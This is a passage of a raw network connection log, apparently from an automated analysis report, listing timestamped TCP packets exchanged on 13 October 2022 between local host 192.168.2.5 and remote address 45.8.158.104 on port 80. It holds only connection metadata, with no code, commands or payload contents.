                                      Oct 13, 2022 09:30:53.924340010 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:53.924360991 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:53.924360991 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.924393892 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:53.924402952 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.924438000 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:53.924444914 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.924482107 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:53.924485922 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.924523115 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:53.924526930 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.924561977 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:53.924566984 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.924606085 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:53.924607992 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.924643993 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:53.924649954 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.924689054 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:53.924694061 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.924729109 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:53.924736023 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.924772024 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:53.924777031 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.924813032 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:53.924817085 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.924853086 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:53.924858093 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.924895048 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:53.924899101 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.924936056 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:53.924938917 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.924978971 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:53.924981117 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.925018072 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:53.925021887 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.925060987 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:53.925064087 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.925103903 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:53.925105095 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.925141096 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:53.925147057 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.925184965 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:53.925189972 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.925225019 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:53.925230026 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.925266981 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:53.925271988 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.925312996 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:53.925316095 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.925354004 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:53.925358057 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.925396919 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:53.938015938 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.938082933 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.938117027 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:53.938126087 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.938138962 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:53.938160896 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:53.938169003 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.938201904 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:53.938210011 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.938242912 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:53.938251972 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.938285112 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:53.938292980 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.938325882 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:53.938335896 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.938369036 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:53.938379049 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.938415051 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:53.938417912 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.938451052 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:53.938458920 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.938494921 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:53.938524961 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.938563108 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:53.938657999 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.938694954 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:53.938771963 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.938813925 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.938816071 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:53.938849926 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:53.938855886 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.938925982 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.938939095 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:53.938968897 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.938968897 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:53.939007998 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:53.939012051 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.939044952 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:53.980545998 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.980614901 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.980668068 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.980712891 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.980753899 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.980796099 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.980799913 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:53.980832100 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:53.980842113 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.980882883 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.980923891 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.980941057 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:53.980963945 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.981018066 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:53.981030941 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.981086016 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.981128931 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.981146097 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:53.981163979 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:53.981168985 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.981209040 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.981245995 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:53.981246948 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.981287003 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.981304884 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:53.981326103 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.981365919 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:53.981369019 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:53.981415987 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:53.981451035 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.018419027 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.018639088 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.022754908 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.022804022 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.022846937 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.022860050 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.022891998 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.022891998 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.022911072 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.022948027 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.022972107 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.023001909 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.079674006 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.172065973 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.414618969 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.414688110 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.414752007 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.414769888 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.414797068 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.414834023 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.414834023 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.414840937 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.414859056 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.414923906 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.414927959 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.414963961 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.415007114 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.415045977 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.415049076 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.415088892 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.415102005 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.415102005 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.415112972 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.415235043 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.415235043 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.457063913 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.457129955 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.457161903 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.457195044 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.457237959 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.457278013 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.457319021 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.457350016 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.457367897 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.457391977 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.457432032 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.457434893 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.457454920 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.457479000 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.457505941 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.457514048 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.457557917 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.457567930 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.457600117 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.457623959 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.457642078 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.457674026 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.457689047 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.457726002 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.457772017 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.499522924 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.499586105 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.499625921 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.499653101 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.499653101 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.499665976 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.499712944 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.499715090 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.499715090 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.499754906 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.499768972 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.499799013 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.499804020 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.499840021 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.499845028 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.499882936 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.499886990 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.499919891 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.499932051 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.499960899 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.499967098 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.500003099 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.500011921 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.500041962 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.500062943 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.500073910 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.500101089 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.500113964 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.500140905 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.500157118 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.500185013 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.500200033 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.500226021 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.500231981 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.500245094 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.500282049 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.542006969 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.542063951 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.542104959 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.542135954 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.542151928 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.542152882 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.542152882 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.542176008 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.542217970 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.542222977 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.542222977 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.542258024 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.542258024 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.542292118 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.542310953 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.542334080 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.542336941 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.542375088 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.542377949 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.542416096 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.542418003 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.542445898 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.542459965 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.542483091 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.542485952 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.542526007 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.542529106 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.542565107 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.542570114 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.542594910 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.542606115 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.542634964 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.584462881 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.584501982 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.584525108 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.584599972 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.584636927 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.584636927 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.584636927 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.584697008 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.584733009 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.584760904 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.584804058 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.584825993 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.584944010 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.585036039 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.585130930 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.585212946 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.585269928 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.585347891 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.585385084 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.585458994 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.585479975 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.585549116 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.585585117 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.585653067 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.585690975 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.585764885 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.585802078 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.585872889 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.585938931 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.585999012 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.586014986 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.586075068 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.586082935 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.586138010 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.586149931 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.586240053 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.586277962 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.586350918 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.627170086 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.627224922 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.627249956 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.627266884 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.627301931 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.627306938 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.627307892 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.627341986 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.627343893 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.627382994 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.627388954 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.627425909 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.627480030 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.627522945 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.627530098 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.627563953 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.627568007 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.627604008 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.627609968 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.627638102 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.627646923 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.627679110 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.627679110 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.627722025 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.627727032 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.627763987 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.627767086 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.627794981 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.627809048 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.627837896 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.667911053 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.667968988 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.668009996 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.668042898 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.668087006 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.668175936 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.669675112 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.669718981 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.669761896 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.669770956 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.669792891 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.669802904 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.669832945 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.669832945 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.669852018 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.669879913 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.669894934 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.669919968 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.669950008 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.669960976 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.669980049 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.670032024 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.670355082 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.670396090 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.670435905 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.670458078 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.670475006 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.670492887 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.670531034 CEST4969680192.168.2.545.8.158.104
                                      Oct 13, 2022 09:30:54.670581102 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.670622110 CEST804969645.8.158.104192.168.2.5
                                      Oct 13, 2022 09:30:54.670639992 CEST4969680192.168.2.545.8.158.104
